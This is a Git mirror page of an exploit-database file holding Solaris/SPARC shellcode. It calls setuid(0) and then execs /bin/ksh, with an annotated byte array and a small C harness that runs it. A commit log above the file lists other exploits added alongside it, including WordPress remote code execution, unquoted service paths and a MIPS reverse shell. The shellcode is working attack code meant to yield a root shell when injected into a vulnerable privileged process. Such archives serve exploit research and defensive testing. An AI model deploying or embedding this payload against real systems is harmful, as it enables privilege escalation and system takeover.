bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/solaris_sparc/50750.c
Offensive Security f2d7e05ad0 DB: 2022-02-19 
17 changes to exploits/shellcodes

Wondershare Dr.Fone 11.4.9 - 'DFWSIDService' Unquoted Service Path
Wondershare MobileTrans 3.5.9 - 'ElevationService' Unquoted Service Path
Wondershare FamiSafe 1.0 - 'FSService' Unquoted Service Path
Wondershare UBackit 2.0.5 - 'wsbackup' Unquoted Service Path
TOSHIBA DVD PLAYER Navi Support Service - 'TNaviSrv' Unquoted Service Path
Bluetooth Application 5.4.277 - 'BlueSoleilCS' Unquoted Service Path
Intel(R) Management Engine Components 6.0.0.1189 - 'LMS' Unquoted Service Path
File Sanitizer for HP ProtectTools 5.0.1.3 - 'HPFSService' Unquoted Service Path
Connectify Hotspot 2018 'ConnectifyService' - Unquoted Service Path
WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation
WordPress Plugin dzs-zoomsounds 6.60 - Remote Code Execution (RCE) (Unauthenticated)
Hotel Druid 3.0.3 - Remote Code Execution (RCE)
Fortinet Fortimail 7.0.1 - Reflected Cross-Site Scripting (XSS)

Solaris/SPARC - setuid(0) + chmod (/bin/ksh) + exit(0) Shellcode
Solaris/SPARC - chmod(./me) Shellcode
Solaris/SPARC - setuid(0) + execve (/bin/ksh) Shellcode
Linux/MIPS - N32 MSB Reverse Shell Shellcode
2022-02-19 05:01:36 +00:00

35 lines
No EOL
1,022 B
C
Raw Blame History

/*
* sparc_solaris_exec.c - Solaris/SPARC execve() shellcode
* Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Pretty standard Solaris/SPARC setuid/execve shellcode.
*
* Tested on:
* SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
*/
char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
/* setuid(0) */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
/* execve("/bin/ksh", argv, NULL) */
"\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
"\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
"\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
"\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
"\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
"\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
"\x41\x41\x41\x41" /* placeholder */
"/bin/ksh";
void main()
{
void (*f)() = (void *)sc;
f();
}
Reference in a new issue View git blame Copy permalink